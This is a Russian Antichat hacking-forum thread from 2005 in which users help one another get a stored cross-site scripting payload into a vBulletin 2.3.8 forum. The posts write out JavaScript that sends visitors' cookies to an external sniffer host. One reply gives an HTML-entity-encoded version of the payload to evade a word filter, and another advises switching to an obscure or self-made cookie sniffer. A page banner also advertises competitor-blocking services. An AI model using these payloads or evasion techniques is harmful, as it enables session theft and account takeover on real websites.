Форум АНТИЧАТ - Проблема с XSS в vBulletin 2.x.x. Просьба помочь.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Проблема с XSS в vBulletin 2.x.x. Просьба помочь.

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Проблема с XSS в vBulletin 2.x.x. Просьба помочь.

16.12.2005, 15:01

ProblemaT

Познающий

Регистрация: 16.12.2005

Сообщений: 42

Провел на форуме:
173841

Репутация: -4

Проблема с XSS в vBulletin 2.x.x. Просьба помочь.

Такое дело прописываю эту xss(изложено в этой теме http://forum.antichat.ru/showthread.php?t=5469) в форуме vBulletin версии 2.3.8 а она заменяется на такую вот хню aaa@aaa.aa"'s='' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));, появляются эти звёздочки. Кто нить может мне помочь, может её можно как нить запрятать.

Последний раз редактировалось ProblemaT; 16.12.2005 в 15:07..

16.12.2005, 15:04

~~Thesaurus~~

Banned

Регистрация: 03.12.2005

Сообщений: 22

Провел на форуме:
82546

Репутация: 30

Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

http://ha.ckers.org/xss.html

А вообще исходный код страницы дай..

16.12.2005, 15:10

ProblemaT

Познающий

Регистрация: 16.12.2005

Сообщений: 42

Провел на форуме:
173841

Репутация: -4

Цитата:

Сообщение от Thesaurus

Тыпрочитай тему которую я указал выше.

16.12.2005, 15:13

ProblemaT

Познающий

Регистрация: 16.12.2005

Сообщений: 42

Провел на форуме:
173841

Репутация: -4

Цитата:

Сообщение от Thesaurus

http://ha.ckers.org/xss.html

А где тут именно шифровать я не пойму?

16.12.2005, 15:18

~~Thesaurus~~

Banned

Регистрация: 03.12.2005

Сообщений: 22

Провел на форуме:
82546

Репутация: 30

Цитата:

Сообщение от ProblemaT

А где тут именно шифровать я не пойму?

Цитата:

Character Encoding Calculator

тут...

16.12.2005, 15:53

ProblemaT

Познающий

Регистрация: 16.12.2005

Сообщений: 42

Провел на форуме:
173841

Репутация: -4

Цитата:

Сообщение от Thesaurus

Resylitat koda svoego dai. Chto vidno v HTML?

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));</font></p>

16.12.2005, 16:11

~~Thesaurus~~

Banned

Регистрация: 03.12.2005

Сообщений: 22

Провел на форуме:
82546

Репутация: 30

Код HTML:

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='&#105&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#116&#104&#105&#115&#46&#115&#115&#115&#61&#110&#117&#108&#108" style=&#116&#111&#112&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#101&#118&#97&#108&#40&#116&#104&#105&#115&#46&#115&#115&#115&#41&#41&#59</font></p>

http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов.

16.12.2005, 16:25

ProblemaT

Познающий

Регистрация: 16.12.2005

Сообщений: 42

Провел на форуме:
173841

Репутация: -4

Цитата:

Сообщение от Thesaurus

Код HTML:

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='&#105&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#97&#110&#116&#105&#99&#104&#97&#116&#46&#114&#117&#47&#99&#103&#105&#45&#98&#105&#110&#47&#115&#46&#106&#112&#103&#63&#39&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#116&#104&#105&#115&#46&#115&#115&#115&#61&#110&#117&#108&#108" style=&#116&#111&#112&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#101&#118&#97&#108&#40&#116&#104&#105&#115&#46&#115&#115&#115&#41&#41&#59</font></p>

http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов.

А какой брать код HTML (with semicolons) или HTML (without semicolons)?

16.12.2005, 16:35

ProblemaT

Познающий

Регистрация: 16.12.2005

Сообщений: 42

Провел на форуме:
173841

Репутация: -4

Не выходит, пишет как простой текст.

#10

16.12.2005, 18:12

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

Провел на форуме:
4520553

Репутация: 1316

если заменяет на звездочки значит чел, фильтрует через фильтр матов, тоесть вписываешь туда слова и он их заменяет на *
Секешь к чему я?

Цитата:

src='http://********

если он такое делает, значит он обрезает твой сайт, допустим многие форумы стали добавлять в мат античатовский сниффер, решаеться это "навождение косых умов" очень просто, ищещь не распространненый особо сниффер, в конце концов можешь сделать сам. пробобуй здесь netsec.ru там тебе персональный сниф дадут

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблема с установкой vBulletin 3.0	SNIFF	Болталка	6	28.10.2005 19:57
Люди Кто Может ПОмочь с Шелл	anakin	Болталка	4	07.06.2005 08:43
XSS в vBulletin 2.x.x	KEZ	Комментарии к видео	16	19.03.2005 02:18

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход